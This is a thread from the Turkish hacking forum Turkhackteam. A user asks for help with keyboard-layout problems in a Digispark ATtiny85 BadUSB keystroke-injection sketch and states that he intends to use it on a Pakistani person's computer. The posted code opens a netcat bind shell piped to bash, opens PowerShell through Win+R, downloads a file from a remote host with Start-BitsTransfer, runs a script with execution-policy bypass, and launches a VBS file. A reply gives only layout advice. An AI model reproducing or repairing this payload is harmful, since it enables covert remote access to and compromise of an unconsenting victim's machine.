Digispark BadUSB Klavye Problemi

Kerim Abdul Cabbar

Katılımcı Üye
5 Tem 2013
254
0
İstanbul
Herkese merhaba,

Digispark Attiny85 kartıyla BadUSB yapmaya çalışıyorum. Windows 10 sanal makinede test ediyorum. İlk denediğimde, "." (nokta) yerine "ç" harfini kullandı. Buna benzer karışıklıklar çıktı. Sonrasında kodda bazı revizeler yaptım. Dün geceki denememde ise, kart yeşil yandı ve hiçbir şey olmadı bu kez. Kendi sanal makinem Türkçe ve klavyesi de Türkçe. Dolayısıyla şimdilik kartın Türkçe klavye kullanması lazım. Başarılı olduğu takdirde ise Pakistanlı birinin PC'sinde kullanacağım. Haliyle Pakistan'da en sık kullanılan klavye çeşidiyle kodlama yapmam lazım.

Türkçe ve diğer dillerde klavyeleri nereden bulabilir ve koduma nasıl entegre edebilirim? Kullandığım kodlama aşağıdadır. Yardım edenlere müteşekkir olurum.

#define kbd_tr_tr
#include "DigiKeyboard.h"
void setup() {
Keyboard.print("setxkbmap tr\n");
delay(500);
Keyboard.print("nc -l 6566 < <(nc -l 6565 | bash)\n");
Keyboard.end();
// put your setup code here, to run once:

}

void loop() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(Key_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("Start-BitsTransfer ornekhost.subdomain.com - Subdomain.com");
DigiKeyboard.delay(500);
DigiKeyboard.delay(3000);
DigiKeyboard.print("powershell -ExecutionPolicy Bypass -File indir.ps1");
DigiKeyboard.delay(500);
DigiKeyboard.delay(4000);
DigiKeyboard.print("exit");
DigiKeyboard.delay(500);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("islem.vbs");
DigiKeyboard.delay(500);

}

TaoLao

Katılımcı Üye
4 Ara 2020
602
200
127.0.0.1
Merhaba, ilgili kütüphane Türkçe desteklemediğinden ötürü hata alıyorsunuz, ya scriptlerinizi tamamen ingilizce karakterlerle yazacaksınız yada aşşağıda verdiğim linkten türkçe karakterlerle nasıl uyumlu olacağını görebilirsiniz. İyi forumlar.
TIKLA

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.